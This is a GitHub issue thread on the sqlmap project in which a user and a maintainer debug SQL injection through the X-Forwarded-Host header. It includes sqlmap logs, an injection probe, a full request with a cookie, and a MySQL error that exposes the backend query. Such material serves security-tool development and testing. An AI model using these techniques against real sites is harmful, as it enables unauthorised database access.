New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Specific location error #2536
Comments
sqlmap already does it. Two things. 1) Always use valid values when you are doing SQLi (e.g. in your case you could use: Please run some proxy in between (e.g. Burp) and inspect requests and responses to find out what is going on. |
As I can see you have something that is totally non conformant to web standards. Error is returned right after the error code ( |
Yes it's absolutely not standard! But is it possible to write a tamper for this case? |
Correction. Maybe it is not so non-conformant as I first thought. Looking into ways how to support it. |
@lordo can you please update and retry? |
With this command line [22:45:16] [INFO] parsing HTTP request from 'inv.txt' Parameter: X-Forwarded-Host #1* ((custom) HEADER) [22:45:26] [INFO] the back-end DBMS is MySQL [*] shutting down at 22:45:26` |
But not retrive columns! [*] starting at 22:52:02 [22:52:02] [INFO] parsing HTTP request from 'inv.txt' [22:52:04] [DEBUG] declared web page charset 'utf-8' Parameter: X-Forwarded-Host #1* ((custom) HEADER) [22:52:04] [INFO] testing MySQL |
@lordo I believe that you are limited to certain queries because of header injection. Please use |
The data is retrieved perfectly! But with columns there is an understand situation. Nothing happens at all, the sqlmap doesn't even try to get a column and immediately writes that it is not possible. Command line: The log file contains 1 query in which the vulnerable header (X-Forwarded-Host) is empty! That is, sqlmap did not set anything up, but said that he could not retrieve the columns LogFile: HTTP response [#1] (200 OK): #HTML SITE# |
Can you please send a traffic file to |
The mysql error is in the header name.
Can I make changes so that the header values are handled by sqlmap as well as the page.
LOG:
`[16:15:58] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'X-Forwarded-Host #1*' might not be injectable
[16:15:58] [PAYLOAD] 'gSjgHl<'">GunUja
[16:15:58] [TRAFFIC OUT] HTTP request [#5]:
GET / HTTP/1.1
Accept: /
Host: site.com:443
Accept-encoding: gzip,deflate
X-forwarded-host: 'gSjgHl<'">GunUja
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: 5fd55f8c1289a9f2dd7accf74deb8350=b0e2dea0463595a6877feedb63e6a341
Connection: close
[16:15:58] [TRAFFIC IN] HTTP response [#5] (500 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'">
;gunuja/' or domain_name='http://www.'gsjghl<'">gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;):
Content-length: 185
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Vary: Accept-Encoding
Uri: https://site.com:443/
Server: nginx/1.10.1
Connection: close
Pragma: no-cache
Cache-control: no-cache
Date: Tue, 16 May 2017 16:21:46 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html
[16:15:58] [DEBUG] got HTTP error code: 500 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'">
;gunuja/' or domain_name='http://www.'gsjghl<'">gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;)`
The text was updated successfully, but these errors were encountered: